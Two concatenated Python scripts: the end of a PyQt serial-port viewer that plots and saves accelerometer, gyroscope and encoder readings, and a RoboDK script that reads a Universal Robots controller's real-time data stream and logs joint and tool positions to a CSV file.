self.setFixedSize(*self._positions[2:])
buttons = {"OPEN": {"pos": (10, 10, 100, 22), "func": self.start_reading},
"CLOSE": {"pos": (110, 10, 100, 22), "func": self.stop_reading},
"SAVE": {"pos": (250, 10, 100, 22), "func": self.save_data},
"CLEAR": {"pos": (350, 10, 100, 22), "func": self.clear_window}}
for btn_name, btn_params in buttons.items():
btn = QPushButton(btn_name, self)
btn.setGeometry(*btn_params["pos"])
btn.clicked.connect(btn_params["func"])
bits = [str(i) for i in range(8, 4, -1)]
stop_bits = [str(i) for i in range(1, 3)]
ports = [f"COM{i}" for i in range(1, 11)]
sensors = ["ACCELEROMETER", "GYROSCOPE", "ENCODERS"]
parity = ('NONE', 'ODD', 'EVEN', 'MARK', 'SPACE')
baud_rates = ("115200", "57600", "38400", "19200", "9600", "1200", "300", "921600", "460800",
"230400", "4800", "2400", "150", "110")
combo_boxes = {self.comboBoxCOM: {"items": ports, "func": self.combo_com_change, "pos": (500, 10),
"def": ports.index(self.com_port), "label": "Port"},
self.comboBoxBaud: {"items": baud_rates, "func": self.combo_bit_change, "pos": (610, 10),
"def": baud_rates.index(self.baud_rate), "label": "Baud"},
self.comboBoxBit: {"items": bits, "func": self.combo_bit_change, "pos": (720, 10),
"def": bits.index(self.data_bits), "label": "Data bits"},
self.comboBoxParity: {"items": parity, "func": self.combo_parity_change, "pos": (830, 10),
"def": parity.index(self.parity), "label": "Parity"},
self.comboBoxStopBits: {"items": stop_bits, "func": self.combo_stopbits_change, "pos": (940, 10),
"def": stop_bits.index(self.stop_bits), "label": "Stop bits"},
self.comboBoxSensor: {"items": sensors, "func": self.combo_sensor_change, "pos": (1050, 10),
"def": sensors.index(self.sensor), "label": "Sensors"}}
for combo_box, combo_params in combo_boxes.items():
for item in combo_params["items"]:
combo_box.addItem(item)
combo_box.move(*combo_params["pos"])
combo_box.setCurrentIndex(combo_params["def"])
combo_box.currentIndexChanged.connect(combo_params["func"])
combo_label = QLabel(self)
combo_label.setText(combo_params["label"])
combo_label.move(combo_params["pos"][0], 35)
self.show()
def combo_com_change(self):
self.com_port = self.comboBoxCOM.currentText()
def combo_bit_change(self):
self.data_bits = self.comboBoxBit.currentText()
def combo_parity_change(self):
self.parity = self.comboBoxParity.currentText()
def combo_baud_change(self):
self.baud_rate = self.comboBoxBaud.currentText()
def combo_stopbits_change(self):
self.stop_bits = self.comboBoxStopBits.currentText()
def combo_sensor_change(self):
self.sensor = self.comboBoxSensor.currentText()
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
def set_cursor(self):
self.cursor.movePosition(QtGui.QTextCursor.End)
self.textbox.setTextCursor(self.cursor)
def start_reading(self):
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
if self._reading_thread is None:
self._stop_flag = False
self.read_port()
else:
self.textbox.append(f"Port already opened.\r")
self.set_cursor()
def stop_reading(self):
if self._reading_thread is not None:
self._stop_flag = True
self._reading_thread.join()
self._reading_thread = None
self.textbox.append(f"Port {self.com_port} closed.\n")
self.set_cursor()
def clear_window(self):
self.textbox.setText("")
self._plot_refs = [None, None, None]
self.main_plot.axes.cla()
self.main_plot.draw()
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
def save_data(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
file_name, _ = QFileDialog.getSaveFileName(self, "Save file", "c:\\", "CSV Files (*.csv)", options=options)
if file_name:
df = pd.DataFrame({"time": self.x_data,
"accelX": self.y_data[0][0],
"accelY": self.y_data[0][1],
"accelZ": self.y_data[0][2],
"gyroX": self.y_data[1][0],
"gyroY": self.y_data[1][1],
"gyroZ": self.y_data[1][2],
"enc1": self.y_data[2][0],
"enc2": self.y_data[2][1],
"enc3": self.y_data[2][2]})
df.to_csv(Path(file_name), index=False)
def plot_data(self):
y_data = {"ACCELEROMETER": self.y_data[0], "GYROSCOPE": self.y_data[1], "ENCODERS": self.y_data[2]}
if y_data[self.sensor][0].size >= self.n_data:
y_data_plot = [data[-self.n_data:] for data in y_data[self.sensor]]
for i, colour in enumerate(self.plot_colours):
if self._plot_refs[i] is None:
self._plot_refs[i] = self.main_plot.axes.plot(self.x_data_plot, y_data_plot[i], colour)[0]
else:
self._plot_refs[i].set_ydata(y_data_plot[i])
self.main_plot.draw()
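# reading_loop runs in a worker thread. Each serial line is assumed to carry one
# "[x,y,z]"-style group per sensor, separated by "; ", e.g. (hypothetical example):
#   "ACC[12,-3,980]; GYR[0,1,2]; ENC[5,5,5]"
# Only the bracketed integers are parsed; text outside the brackets is ignored.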
def reading_loop(self, ser):
while not self._stop_flag:
data = ser.readline()
data = str(data.decode('utf-8'))
self.textbox.append(data)
self.cursor.movePosition(QtGui.QTextCursor.End)
self.textbox.setTextCursor(self.cursor)
data_list = data.split("; ")
for sens, sensor_data in enumerate(data_list):
span = re.search(r'\[[^\]]*\]', sensor_data).span()
data_axes = sensor_data[span[0] + 1:span[1] - 1].split(",")
for ax in range(len(data_axes)):
self.y_data[sens][ax] = np.append(self.y_data[sens][ax], int(data_axes[ax]))
self.x_data = np.append(self.x_data, (len(self.x_data) * self.timebase) + self.timebase)
if self.x_data.size > 0:
self.plot_data()
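# read_port opens the serial port with the currently selected settings and starts the
# reader as a daemon thread, so closing the window never blocks on a hung read.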
def read_port(self):
try:
ser = serial.Serial(port=self.com_port,
baudrate=int(self.baud_rate),
bytesize=int(self.data_bits),
parity=self.parity[0],
stopbits=int(self.stop_bits))
self.textbox.append(f"Port {self.com_port} opened.\r")
self.set_cursor()
self._reading_thread = Thread(target=self.reading_loop, args=(ser,), daemon=True)
self._reading_thread.start()
except serial.serialutil.SerialException:
self.textbox.append(f"No device found on {self.com_port}.\n")
self.set_cursor()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Window()
app.exec_()
|
UR_Monitoring_CSV.py
|
# This script creates a thread to monitor the position and other variables from a real UR robot and stores the data to a CSV file
# With this script running, RoboDK will save a CSV file of the robot status
#
# Press F5 to run the script
# Or visit: http://www.robodk.com/doc/en/PythonAPI/
from robolink import * # API to communicate with RoboDK
from robodk import * # basic matrix operations
import threading
import socket
import struct
import os
import time
TOLERANCE_JOINTS_REFRESH = 1e9 # Refresh the screen every time the robot position changes by this much (in deg)
RETRIEVE_JOINTS_ONCE = False # If True, the current robot position will be retrieved once only
SAVE_CSV_FILE = True # If True, the position and speed of the TCP will be recorded with a time stamp
# Create targets given a tolerance in degrees
CREATE_TARGETS = False
TOLERANCE_JOINTS_NEWTARGET = 1e9 # tolerance in degrees
REFRESH_RATE = 0.01 # Display rate in RoboDK
# Make current robot joints accessible in case we run it on a separate thread
global ROBOT_JOINTS
# Procedure to check if robot joint positions are different according to a certain tolerance
def Robot_Joints_Check(jA,jB, tolerance_deg=1):
if jA is None:
return True
for i in range(6):
if abs(jA[i]-jB[i]) > tolerance_deg*pi/180:
return True
return False
#########################################################################
# Byte shifts to point to the right byte data inside a packet
UR_GET_TIME = 1
UR_GET_JOINT_POSITIONS = 252 # Real Joint Position
UR_GET_JOINT_SPEEDS = 300 # Real Joint Speeds
UR_GET_JOINT_CURRENTS = 348
UR_GET_TCP_POSITION = 444 # Real TCP position
UR_GET_TCP_SPEED = 492 # Real TCP speed
UR_GET_TCP_FORCES = 540
UR_GET_INPUTS = (86-32)*8 + 252
UR_GET_OUTPUTS = (131-32)*8 + 252
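# These constants are byte offsets into the real-time interface packet (port 30003).
# The exact layout depends on the controller's Polyscope version, which is why
# packet_value() below tolerates offsets that fall outside the received packet.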
# Get packet size according to the byte array
def packet_size(buf):
if len(buf) < 4:
return 0
return struct.unpack_from("!i", buf, 0)[0]
# Check if a packet is complete
def packet_check(buf):
msg_sz = packet_size(buf)
if len(buf) < msg_sz:
print("Incorrect packet size %i vs %i" % (msg_sz, len(buf)))
return False
return True
# Get specific information from a packet
def packet_value(buf, offset, nval=6):
if len(buf) < offset+nval:
print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
return None
fmt = '!'
for i in range(nval):
fmt+='d'
return list(struct.unpack_from(fmt, buf, offset)) #return list(struct.unpack_from("!dddddd", buf, offset))
# Get packet bits
def packet_value_bin(buf, offset, nval=8):
if len(buf) < offset+nval:
print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
return None
return ''.join(format(x, '02x') for x in buf[offset:(offset+nval)])
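# Hypothetical convenience wrapper (not used anywhere in this script) showing how the
# helpers above fit together; the offsets remain version-dependent assumptions.
def packet_to_dict(buf):
    return {
        "joints_rad": packet_value(buf, UR_GET_JOINT_POSITIONS),  # 6 doubles, radians
        "tcp_pose": packet_value(buf, UR_GET_TCP_POSITION),       # x, y, z (m) + u, v, w (rad)
        "tcp_speed": packet_value(buf, UR_GET_TCP_SPEED),
        "inputs": packet_value_bin(buf, UR_GET_INPUTS),           # 8 bytes as a hex string
        "outputs": packet_value_bin(buf, UR_GET_OUTPUTS),
    }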
#########################################################################
# Enter RoboDK IP and Port
ROBOT_IP = None #'192.168.2.31'
ROBOT_PORT = 30003
# Start RoboDK API
RDK = Robolink()
# Retrieve a robot
robot = RDK.ItemUserPick('Select a UR robot to monitor', ITEM_TYPE_ROBOT)
if not robot.Valid():
quit()
robotname = robot.Name()
print("Using robot %s" % robotname)
# Retrieve Robot's IP:
if ROBOT_IP is None:
ip,port,path,ftpuser,ftppass = robot.ConnectionParams()
ROBOT_IP = ip
if SAVE_CSV_FILE:
# Save monitoring to file:
file_path = RDK.getParam('FILE_OPENSTATION')[:-4] + '_Monitoring_%s_%s.csv' % (robotname, time.strftime("%Y-%m-%d-%Hh%Mm%Ss", time.gmtime()))
print("Monitoring robot %s to %s" % (robotname, file_path))
fid = open(file_path,'w')
fid.write('time (s), Speed (m/s), Speed (rad/s), J1 (deg), J2 (deg), J3 (deg), J4 (deg), J5 (deg), J6 (deg), TCP X (m), TCP Y (m), TCP Z (m), TCP u (rad), TCP v (rad), TCP w (rad), Speed X (m/s), Speed Y (m/s), Speed Z (m/s), Speed u (rad/s), Speed v (rad/s), Speed w (rad/s), Inputs, Outputs\n')
tic()
# Action to take when a new packet arrives
def on_packet(packet, packet_id):
global ROBOT_JOINTS
# Retrieve desired information from a packet
rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS)
ROBOT_JOINTS = [ji * 180.0/pi for ji in rob_joints_RAD]
ROBOT_TCP_XYZUVW = packet_value(packet, UR_GET_TCP_POSITION)
ROBOT_TCP_SPEED = packet_value(packet, UR_GET_TCP_SPEED)
ROBOT_INPUTS = packet_value_bin(packet, UR_GET_INPUTS)
ROBOT_OUTPUTS = packet_value_bin(packet, UR_GET_OUTPUTS)
#print("Output:")
#print(ROBOT_OUTPUTS)
#ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS)
#ROBOT_CURRENT = packet_value(packet, UR_GET_JOINT_CURRENTS)
#print(ROBOT_JOINTS)
# Record once every 5 packets (125/5=25 Hz)
if SAVE_CSV_FILE:
if packet_id % 5 == 0:
fid.write(str(toc())) # Write time stamp in seconds
fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[0:3])) # Position speed
fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[3:6])) # Orientation speed
for value in ROBOT_JOINTS:
fid.write(',%.6f' % value)
for value in ROBOT_TCP_XYZUVW:
fid.write(',%.6f' % value)
for value in ROBOT_TCP_SPEED:
fid.write(',%.6f' % value)
fid.write(',' + ROBOT_INPUTS)
fid.write(',' + ROBOT_OUTPUTS)
fid.write('\n')
# Monitor thread to retrieve information from the robot
def UR_Monitor():
while True:
print("Connecting to robot %s -> %s:%i" % (robotname, ROBOT_IP, ROBOT_PORT))
rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT))
print("Connected")
buf = b''
packet_count = 0
packet_time_last = time.time()
while True:
more = rt_socket.recv(4096)
if more:
buf = buf + more
if packet_check(buf):
packet_len = packet_size(buf)
packet, buf = buf[:packet_len], buf[packet_len:]
on_packet(packet, packet_count)
packet_count += 1
if packet_count % 250 == 0:
t_now = time.time()
msg = "Monitoring %s at %.1f packets per second" % (robotname, packet_count/(t_now-packet_time_last))
print(msg)
RDK.ShowMessage(msg, False)
packet_count = 0
packet_time_last = t_now
rt_socket.close()
ROBOT_JOINTS = None
last_joints_target = None
last_joints_refresh = None
# Start the Robot Monitor thread
#q = queue.Queue()
t = threading.Thread(target=UR_Monitor)
t.daemon = True
t.start()
#UR_Monitor()
# Start the main loop to refresh RoboDK and create targets/programs automatically
target_count = 0
while True:
# Wait for a valid robot joints reading
if ROBOT_JOINTS is None:
continue
# Set the robot to that position
if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH):
last_joints_refresh = ROBOT_JOINTS
robot.setJoints(ROBOT_JOINTS)
# Stop here if we need only the current position
if RETRIEVE_JOINTS_ONCE:
quit(0)
# Check if the robot has moved enough to create a new target
if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET):
last_joints_target = ROBOT_JOINTS
target_count = target_count + 1
newtarget = RDK.AddTarget('T %i' % target_count, 0, robot)
# Take a short break
pause(REFRESH_RATE)
|